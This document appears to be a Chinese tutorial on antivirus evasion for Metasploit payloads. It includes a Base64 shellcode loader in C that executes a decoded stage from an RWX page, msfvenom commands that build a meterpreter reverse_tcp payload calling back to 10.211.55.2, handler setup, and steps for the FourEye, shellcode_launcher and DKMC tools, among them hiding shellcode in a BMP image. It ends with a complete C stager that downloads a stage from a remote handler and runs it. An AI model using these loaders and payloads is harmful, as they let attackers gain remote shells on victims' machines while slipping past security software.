base64.h代码
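/* base64.h -- Apache-style Base64 helpers (implemented in base64.c). */
#ifndef _BASE64_H_   /* NOTE(review): leading underscore + capital is a reserved identifier in C */
#define _BASE64_H_

#ifdef __cplusplus
extern "C" {
#endif

/* Room needed to Base64-encode `len` bytes, including the terminating NUL. */
int Base64encode_len(int len);
int Base64encode(char *coded_dst, const char *plain_src, int len_plain_src);
/* Room needed to decode `coded_src`; use it to size the destination BEFORE calling Base64decode(). */
int Base64decode_len(const char *coded_src);
/* Decodes into plain_dst with no bound of its own; returns the number of bytes written. */
int Base64decode(char *plain_dst, const char *coded_src);

#ifdef __cplusplus
}
#endif

#endif /* _BASE64_H_ */

/* shellcode.c -- Base64 stage loader: decodes `buf`, copies it into an RWX
 * page and jumps to it.  Lab tooling only: the process executes whatever
 * decodes from `buf`, and the RWX allocation is itself a common EDR signal. */
#include <Windows.h>
#include <stdio.h>
#include <string.h>
#include "base64.h"

/* Base64-encoded stage emitted by `msfvenom --encrypt base64` (see below). */
unsigned char buf[] = "msf base64 code here";

/*
 * Entry point.  argc/argv are unused.
 * Returns 1 (without executing anything) if the decoded stage would not fit
 * in the fixed stack buffer or the executable page cannot be allocated.
 */
int main(int argc, const char *argv[]) {
    (void)argc;
    (void)argv;

    char str1[1000] = { 0 };
    const char *encoded = (const char *)buf;

    /* Base64decode() writes without a bound: a stage larger than str1 would
     * overrun the stack.  Size the decode up front and refuse oversized input. */
    int need = Base64decode_len(encoded);
    if (need <= 0 || (size_t)need > sizeof(str1)) {
        fprintf(stderr, "decoded stage needs %d bytes, buffer holds %lu\n",
                need, (unsigned long)sizeof(str1));
        return 1;
    }

    int decoded = Base64decode(str1, encoded);
    if (decoded <= 0 || (size_t)decoded > sizeof(str1)) {
        fprintf(stderr, "base64 decode failed\n");
        return 1;
    }

    /* RWX in one step (PAGE_EXECUTE_READWRITE); a W^X split would be quieter
     * but is deliberately left as the original's behaviour. */
    char *memory = VirtualAlloc(NULL, sizeof(str1), MEM_COMMIT | MEM_RESERVE,
                                PAGE_EXECUTE_READWRITE);
    if (memory == NULL) {
        fprintf(stderr, "VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }

    /* Only the decoded bytes are meaningful; the rest of str1 is zero padding. */
    memcpy(memory, str1, (size_t)decoded);
    ((void (*)(void))memory)();
    return 0;
}

/* Next step: generate the Base64-encoded stage with msfvenom (command below). */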
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=10.211.55.2 lport=3333 -f c > shell.c
注意：`--encrypt base64` 只是编码而不是加密，加载器中的 Base64decode() 直接还原出原始 shellcode，它只能绕过对明文 shellcode 的简单静态特征匹配。
gcc 编译
gcc shellcode.c base64.c -o test.exe
③ 进行监听
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.211.55.2
set LPORT 3333
set EnableStageEncoding true
五、FourEye免杀kali环境下使用
直接使用即可
python3 BypassFramework.py
加载器方法
1. 使用 shellcode_launcher
① 生成 raw 格式的 shellcode
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333 -f raw -o shellcode.raw
② 用 shellcode_launcher 执行，产生 exe 文件
shellcode_launcher.exe -i shellcode.raw#1
六、DKMC 免杀
[*] (gen) 将 msf 的 shellcode 注入到一个 BMP 图像
[*] (web) 启动 web 服务用来分发 BMP 图像
[*] (ps) 生成 PowerShell 的 payload
[*] (sc) 将 msf 生成的 raw 文件转为 shellcode
[*] (exit) 退出
生成步骤与原理
先利用 msf 生成 raw 文件；利用 sc 将 raw 文件转换为 shellcode；利用 gen 将上一步的 shellcode 注入到一个 BMP 图像；利用 ps 生成基于 PowerShell 的、加载该 BMP 文件的 payload；用 web 提供的简单 web 服务分发 BMP 文件。
https://mp.weixin.qq.com/s/UZqOBQKEMcXtF5ZU7E55Fg
详细参考教程:
https://www.freebuf.com/articles/system/227463.html
https://uknowsec.cn/posts/notes/shellcode%E5%8A%A0%E8%BD%BD%E6%80%BB%E7%BB%93.html
七、思维导图

meta64位过杀软
过32位
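/*
 * A C-based stager client compatible with the Metasploit Framework,
 * based on a discussion on the Metasploit Framework mailing list.
 *
 * @author Raphael Mudge (raffi@strategiccyber.com)
 * @license BSD License.
 *
 * Relevant messages:
 *   http://mail.metasploit.com/pipermail/framework/2012-September/008660.html
 *   http://mail.metasploit.com/pipermail/framework/2012-September/008664.html
 *
 * Protocol as implemented here: connect to the handler, read a 4-byte stage
 * length in native byte order, read that many bytes into an RWX buffer behind
 * a `mov edi, <socket>` prefix, then jump to it.  The 5-byte prefix and the
 * 4-byte socket copy assume a 32-bit build (the page itself files this under
 * "32-bit"); on a 64-bit build SOCKET is wider than the 4 bytes copied.
 * Link against ws2_32 (e.g. `-lws2_32`).
 */
#include <winsock2.h>   /* must come before windows.h, which otherwise pulls in winsock.h */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Largest stage we are willing to receive.  The length comes from the remote
 * handler and is untrusted; without a cap, 0xFFFFFFFC..0xFFFFFFFF makes
 * `size + 5` wrap and recv_all() overrun the allocation.  16 MiB is far above
 * any Metasploit stage; tune if a larger one is ever needed. */
#define STAGE_MAX_BYTES (16u * 1024u * 1024u)

/* Initialise Winsock 2.2; exits the process if ws2_32 is unusable. */
void winsock_init(void) {
    WSADATA wsaData;
    WORD wVersionRequested = MAKEWORD(2, 2);

    /* WSAStartup() returns 0 on success and a positive WSA error code on
     * failure, so the original `< 0` test could never fire. */
    if (WSAStartup(wVersionRequested, &wsaData) != 0) {
        printf("ws2_32.dll is out of date.\n");
        WSACleanup();
        exit(1);
    }
}

/* Report `error`, release the socket and Winsock, and exit with status 1. */
void punt(SOCKET my_socket, const char *error) {
    printf("Bad things: %s\n", error);
    closesocket(my_socket);
    WSACleanup();
    exit(1);
}

/*
 * Receive exactly `len` bytes into `buffer`, looping over short reads.
 * Returns len on success; on error or a closed connection it does not
 * return (punt() exits).
 */
int recv_all(SOCKET my_socket, void *buffer, int len) {
    int tret = 0;
    char *startb = (char *)buffer;   /* arithmetic on void * is a GNU extension */

    while (tret < len) {
        int nret = recv(my_socket, startb + tret, len - tret, 0);
        /* Check before advancing: the original added SOCKET_ERROR (-1) to the
         * cursor first, and a 0 return (peer closed) would spin forever. */
        if (nret == SOCKET_ERROR)
            punt(my_socket, "Could not receive data");
        if (nret == 0)
            punt(my_socket, "Connection closed before all data was received");
        tret += nret;
    }
    return tret;
}

/*
 * Resolve `targetip` (name or dotted quad) and open a TCP connection to
 * `port`.  Returns the connected socket; any failure exits via punt().
 */
SOCKET wsconnect(char *targetip, int port) {
    struct hostent *target;
    struct sockaddr_in sock = { 0 };   /* zero sin_zero and anything we do not set */
    SOCKET my_socket;

    my_socket = socket(AF_INET, SOCK_STREAM, 0);
    if (my_socket == INVALID_SOCKET)
        punt(my_socket, "Could not initialize socket");

    target = gethostbyname(targetip);
    if (target == NULL)
        punt(my_socket, "Could not resolve target");

    /* h_length was copied verbatim into the 4-byte sin_addr; only an IPv4
     * record of exactly that size may be copied. */
    if (target->h_addrtype != AF_INET ||
        target->h_length != (int)sizeof(sock.sin_addr))
        punt(my_socket, "Resolver returned a non-IPv4 address");

    memcpy(&sock.sin_addr.s_addr, target->h_addr, sizeof(sock.sin_addr.s_addr));
    sock.sin_family = AF_INET;
    sock.sin_port = htons((u_short)port);

    if (connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) != 0)
        punt(my_socket, "Could not connect to target");

    return my_socket;
}

/*
 * Usage: <prog> [host] [port].  Connects to the handler, pulls the stage and
 * executes it in place.  Returns 0 only if the stage itself returns.
 */
int main(int argc, char *argv[]) {
    ULONG32 size;
    char *buffer;
    void (*function)(void);

    winsock_init();

    if (argc != 3) {
        printf("%s [host] [port]\n", argv[0]);
        exit(1);
    }

    /* atoi() reports nothing on bad input; reject out-of-range ports here. */
    int port = atoi(argv[2]);
    if (port <= 0 || port > 65535) {
        printf("Bad port: %s\n", argv[2]);
        exit(1);
    }

    /* connect to the handler */
    SOCKET my_socket = wsconnect(argv[1], port);

    /* read the 4-byte length; recv_all() handles a split read */
    recv_all(my_socket, &size, (int)sizeof(size));
    if (size == 0)
        punt(my_socket, "read a strange or incomplete length value\n");
    if (size > STAGE_MAX_BYTES)
        punt(my_socket, "stage length exceeds STAGE_MAX_BYTES\n");

    /* allocate a RWX buffer: 5 bytes of prefix plus the stage */
    buffer = VirtualAlloc(0, (SIZE_T)size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (buffer == NULL)
        punt(my_socket, "could not allocate buffer\n");

    /* prepend a little assembly to move our SOCKET value to the EDI register
     * (thanks mihi for pointing this out):
     *   BF 78 56 34 12  =>  mov edi, 0x12345678 */
    buffer[0] = (char)0xBF;
    memcpy(buffer + 1, &my_socket, 4);   /* low 4 bytes of the SOCKET */

    /* read the stage into the buffer */
    recv_all(my_socket, buffer + 5, (int)size);

    /* cast our buffer as a function and call it */
    function = (void (*)(void))buffer;
    function();
    return 0;
}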
